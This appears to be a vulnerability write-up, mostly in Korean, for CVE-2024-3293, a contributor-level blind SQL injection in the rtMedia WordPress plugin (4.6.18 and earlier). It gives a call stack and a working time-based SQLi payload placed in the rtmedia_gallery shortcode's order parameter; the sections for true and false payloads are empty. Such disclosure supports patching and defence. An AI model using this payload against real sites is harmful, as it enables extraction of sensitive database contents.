
CVE-2024-3293 WordPress, BuddyPress 및 bbPress용 rtMedia <= 4.6.18 - 인증된 (Contributor+) SQL Injection (rtmedia_gallery Shortcode를 통한)
rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - 인증된 (Contributor+) SQL Injection via rtmedia_gallery Shortcode
설명
WordPress용 rtMedia for WordPress, BuddyPress and bbPress 플러그인은 버전 4.6.18 이하에서 rtmedia_gallery 단축 코드를 통해 블라인드 SQL 인젝션에 취약합니다. 이는 사용자가 제공한 파라미터에 대한 이스케이프 처리가 부족하고 기존 SQL 쿼리에 대한 사전 준비가 충분하지 않기 때문입니다. 이로 인해 contributor 레벨 이상의 인증된 공격자가 기존 쿼리에 추가 SQL 쿼리를 덧붙여 데이터베이스에서 민감한 정보를 추출할 수 있습니다.
CALL STACK
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Payload:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Payload true:

Payload false:
